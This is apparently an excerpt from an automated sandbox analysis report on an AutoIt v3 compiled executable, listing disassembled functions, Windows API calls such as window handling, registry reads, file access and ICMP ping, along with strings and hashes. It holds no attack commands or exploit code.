                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                    • String ID: +$0$0+m"$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                    • API String ID: 2914291525-2301606172
                                                                                                                                                                                                                                                                                                    • Opcode ID: ff81bd792d6cf386ff103372741ac8154315e62eb9b758f69d9c1e47eb7bdf50
                                                                                                                                                                                                                                                                                                    • Instruction ID: f9c5f9442c4b82e0949e6fa158cc400e29308d9693ad1124abb6512716160260
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff81bd792d6cf386ff103372741ac8154315e62eb9b758f69d9c1e47eb7bdf50
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7421B7B5905219AFDB009F95EC89AEEBBB4FB48710F10521AF611B62A0E7B54548CF90
                                                                                                                                                                                                                                                                                                    Function 00E2370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 356 e2370f-e23724 357 e23726-e23729 356->357 358 e23784-e23786 356->358 360 e2378a 357->360 361 e2372b-e23732 357->361 358->357 359 e23788 358->359 362 e2376f-e23777 DefWindowProcW 359->362 363 e63df4-e63e1c call e22f92 call e3f23c 360->363 364 e23790-e23795 360->364 365 e23804-e2380c PostQuitMessage 361->365 366 e23738-e2373d 361->366 367 e2377d-e23783 362->367 399 e63e21-e63e28 363->399 369 e23797-e2379a 364->369 370 e237bc-e237e3 SetTimer RegisterWindowMessageW 364->370 368 e237b8-e237ba 365->368 371 e23743-e23747 366->371 372 e63e61-e63e75 call e8c8f7 366->372 368->367 375 e237a0-e237b3 KillTimer call e23907 call e259ff 369->375 376 e63d95-e63d98 369->376 370->368 377 e237e5-e237f0 CreatePopupMenu 370->377 378 e2380e-e23818 call e3fcad 371->378 379 e2374d-e23752 371->379 372->368 391 e63e7b 372->391 375->368 384 e63dd0-e63def MoveWindow 376->384 385 e63d9a-e63d9e 376->385 377->368 393 e2381d 378->393 387 e63e46-e63e4d 379->387 388 e23758-e2375d 379->388 384->368 394 e63da0-e63da3 385->394 395 e63dbf-e63dcb SetFocus 385->395 387->362 397 e63e53-e63e5c call e81423 387->397 389 e237f2-e23802 call e2381f 388->389 390 e23763-e23769 388->390 389->368 390->362 390->399 391->362 393->368 394->390 400 e63da9-e63dba call e22f92 394->400 395->368 397->362 399->362 404 e63e2e-e63e41 call e23907 call e2396b 399->404 400->368 404->362
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00E23709,?,?), ref: 00E23777
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00E23709,?,?), ref: 00E237A3
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E237C6
                                                                                                                                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00E23709,?,?), ref: 00E237D1
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00E237E5
                                                                                                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00E23806
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                                                                                                    • String ID: 0$$0$$TaskbarCreated
                                                                                                                                                                                                                                                                                                    • API String ID: 129472671-3836791346
                                                                                                                                                                                                                                                                                                    • Opcode ID: 48dceea2360eeb283eac88d17b442eeaaea7eb99cd539bfb4d505318377f8c90
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5775ad636369191fcf2be1221571eb1b3d6590d0c11fd501ab89966d0273d6f5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48dceea2360eeb283eac88d17b442eeaaea7eb99cd539bfb4d505318377f8c90
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4441FBF12442657EDF141B38FC49BBB3BA5E780304F10222BF602B6190DBB99B48DE61
                                                                                                                                                                                                                                                                                                    Function 00E609DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 412 e609db-e60a0b call e607af 415 e60a26-e60a32 call e55594 412->415 416 e60a0d-e60a18 call e4f636 412->416 421 e60a34-e60a49 call e4f636 call e4f649 415->421 422 e60a4b-e60a94 call e6071a 415->422 423 e60a1a-e60a21 call e4f649 416->423 421->423 432 e60a96-e60a9f 422->432 433 e60b01-e60b0a GetFileType 422->433 430 e60cfd-e60d03 423->430 437 e60ad6-e60afc GetLastError call e4f613 432->437 438 e60aa1-e60aa5 432->438 434 e60b53-e60b56 433->434 435 e60b0c-e60b3d GetLastError call e4f613 CloseHandle 433->435 441 e60b5f-e60b65 434->441 442 e60b58-e60b5d 434->442 435->423 451 e60b43-e60b4e call e4f649 435->451 437->423 438->437 443 e60aa7-e60ad4 call e6071a 438->443 447 e60b69-e60bb7 call e554dd 441->447 448 e60b67 441->448 442->447 443->433 443->437 454 e60bc7-e60beb call e604cd 447->454 455 e60bb9-e60bc5 call e6092b 447->455 448->447 451->423 462 e60bfe-e60c41 454->462 463 e60bed 454->463 455->454 461 e60bef-e60bf9 call e58a2e 455->461 461->430 465 e60c62-e60c70 462->465 466 e60c43-e60c47 462->466 463->461 467 e60c76-e60c7a 465->467 468 e60cfb 465->468 466->465 470 e60c49-e60c5d 466->470 467->468 471 e60c7c-e60caf CloseHandle call e6071a 467->471 468->430 470->465 474 e60ce3-e60cf7 471->474 475 e60cb1-e60cdd GetLastError call e4f613 call e556a6 471->475 474->468 475->474
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E6071A: CreateFileW.KERNEL32(00000000,00000000,?,00E60A84,?,?,00000000,?,00E60A84,00000000,0000000C), ref: 00E60737
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E60AEF
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E60AF6
                                                                                                                                                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00E60B02
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E60B0C
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E60B15
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00E60B35
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00E60C7F
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E60CB1
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00E60CB8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7f29d1bda45fa014046536bf05bc14f383cdb5fdca25f26a7f516caaf8f02f92
                                                                                                                                                                                                                                                                                                    • Instruction ID: 24517142ce201c981262f831be4a176a7306fd182392659e2e51b7166a762d2a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f29d1bda45fa014046536bf05bc14f383cdb5fdca25f26a7f516caaf8f02f92
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67A12432A541188FCF19AF68E852BAE7BE1EF06364F141199F811FB392DB319D06CB51
                                                                                                                                                                                                                                                                                                    Function 00E252A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E25594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00E64B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00E255B2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E25238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E2525A
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00E253C4
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E64BFD
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E64C3E
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00E64C80
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E64CE7
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E64CF6
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                                    • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                                    • Opcode ID: a089dccd2230d21f40af059ce3ae833bd055ff9a2d639de68280de082ff6f380
                                                                                                                                                                                                                                                                                                    • Instruction ID: dd3c89018b0d44c927ece3c3dcce0638ebba187bcc340fb27715d0c2a7480624
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a089dccd2230d21f40af059ce3ae833bd055ff9a2d639de68280de082ff6f380
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05719FB15453019EC304EF76EC819ABBBE8FF98340F40252EF551B72A0EB719A49CB91
                                                                                                                                                                                                                                                                                                    Function 00E234D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00E234DE
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00E234ED
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00E23503
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00E23515
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00E23527
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E2353F
                                                                                                                                                                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 00E23590
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: GetSysColorBrush.USER32(0000000F), ref: 00E23657
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: RegisterClassExW.USER32(00000030), ref: 00E23681
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E23692
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: InitCommonControlsEx.COMCTL32(?), ref: 00E236AF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E236BF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: LoadIconW.USER32(000000A9), ref: 00E236D5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E236E4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                                    • Opcode ID: 00ead6cc48ad410f17bf4e4f67148071b4d40a1203f31a0be58e699ae4836dc4
                                                                                                                                                                                                                                                                                                    • Instruction ID: 84daa29062ac472e3da73830ad0f4bdb42c5251aeea96281e169b521057099b1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00ead6cc48ad410f17bf4e4f67148071b4d40a1203f31a0be58e699ae4836dc4
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04212FB4D01316AFDB109FA6EC55AAA7FB4FB88750F00405EE708B62A0D7B9454DCF90
                                                                                                                                                                                                                                                                                                    Function 00EA0FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 553 ea0fb8-ea0fef call e2e6a0 556 ea100f-ea1021 WSAStartup 553->556 557 ea0ff1-ea0ffe call e2c98d 553->557 559 ea1023-ea1031 556->559 560 ea1054-ea1091 call e3c1f6 call e28ec0 call e3f9d4 inet_addr gethostbyname 556->560 557->556 568 ea1000-ea100b call e2c98d 557->568 563 ea1033 559->563 564 ea1036-ea1046 559->564 576 ea10a2-ea10b0 560->576 577 ea1093-ea10a0 IcmpCreateFile 560->577 563->564 565 ea104b-ea104f 564->565 566 ea1048 564->566 569 ea1249-ea1251 565->569 566->565 568->556 579 ea10b2 576->579 580 ea10b5-ea10c5 576->580 577->576 578 ea10d3-ea1100 call e4017b call e2423c 577->578 589 ea112b-ea1148 IcmpSendEcho 578->589 590 ea1102-ea1129 IcmpSendEcho 578->590 579->580 582 ea10ca-ea10ce 580->582 583 ea10c7 580->583 584 ea1240-ea1244 call e2bd98 582->584 583->582 584->569 591 ea114c-ea114e 589->591 590->591 592 ea11ae-ea11bc 591->592 593 ea1150-ea1155 591->593 594 ea11be 592->594 595 ea11c1-ea11c8 592->595 596 ea115b-ea1160 593->596 597 ea11f8-ea120a call e2e6a0 593->597 594->595 598 ea11e4-ea11ed 595->598 599 ea11ca-ea11d8 596->599 600 ea1162-ea1167 596->600 611 ea120c-ea120e 597->611 612 ea1210 597->612 604 ea11ef 598->604 605 ea11f2-ea11f6 598->605 602 ea11da 599->602 603 ea11dd 599->603 600->592 606 ea1169-ea116e 600->606 602->603 603->598 604->605 608 ea1212-ea1229 IcmpCloseHandle WSACleanup 605->608 609 ea1193-ea11a1 606->609 610 ea1170-ea1175 606->610 608->584 615 ea122b-ea123d call e4013d call e40184 608->615 613 ea11a3 609->613 614 ea11a6-ea11ac 609->614 610->599 616 ea1177-ea1185 610->616 611->608 612->608 613->614 614->598 615->584 618 ea118a-ea1191 616->618 619 ea1187 616->619 618->598 619->618
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000101,?), ref: 00EA1019
                                                                                                                                                                                                                                                                                                    • inet_addr.WSOCK32(?), ref: 00EA1079
                                                                                                                                                                                                                                                                                                    • gethostbyname.WS2_32(?), ref: 00EA1085
                                                                                                                                                                                                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00EA1093
                                                                                                                                                                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EA1123
                                                                                                                                                                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EA1142
                                                                                                                                                                                                                                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00EA1216
                                                                                                                                                                                                                                                                                                    • WSACleanup.WSOCK32 ref: 00EA121C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                                    • String ID: Ping
                                                                                                                                                                                                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                                    • Opcode ID: 241cb5b5c33962274a6c6daabccdefbcd00718e38a0d4e5bf53724410ada81ba
                                                                                                                                                                                                                                                                                                    • Instruction ID: ec7bf76b5c5db7d459162f8b9d7c79d65c710df95d2ef217cb922160311e2560
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 241cb5b5c33962274a6c6daabccdefbcd00718e38a0d4e5bf53724410ada81ba
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B91AE316092419FD720DF29C888F16BBE0AF49318F1495A9F569AF7A2C730FD85CB91
                                                                                                                                                                                                                                                                                                    Function 00E2F6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: Variable must be of type 'Object'.$t5$t5$t5$t5$t5
                                                                                                                                                                                                                                                                                                    • API String ID: 0-3061639177
                                                                                                                                                                                                                                                                                                    • Opcode ID: 59ad757bb878f4945c00c1415d327f8ff18fd414cf9efac6365f10bfa100c375
                                                                                                                                                                                                                                                                                                    • Instruction ID: 644b8223404b296b4fe468c94222fa761fa12157633360b65b374308d438ef6a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59ad757bb878f4945c00c1415d327f8ff18fd414cf9efac6365f10bfa100c375
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09C27B71A00225DFDB24CF68E890AADB7F1BF48314F24917AE949BB391D771AD41CB90
                                                                                                                                                                                                                                                                                                    Function 00E30340 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00E315F2
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                    • String ID: t5$t5$t5$t5$t5
                                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-3253990334
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7f6041be03a2767459fd88e0c2c5c0ff07c17b51fd48c8b60a2f6651c394d4d9
                                                                                                                                                                                                                                                                                                    • Instruction ID: e44e0f4b62887bde275b1cc058797524ab8c5746851d8fdaa374fbc4e5679f81
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f6041be03a2767459fd88e0c2c5c0ff07c17b51fd48c8b60a2f6651c394d4d9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36B2BC74A08301CFDB24CF18C494A6ABBF1BF89308F14A95DE999AB351D771ED44CB92
                                                                                                                                                                                                                                                                                                    Function 00E22793 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153comCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E232AF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E232B7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E232C2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E232CD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E232D5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E232DD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E23205: RegisterWindowMessageW.USER32(00000004,?,00E22964), ref: 00E2325D
                                                                                                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E22A0A
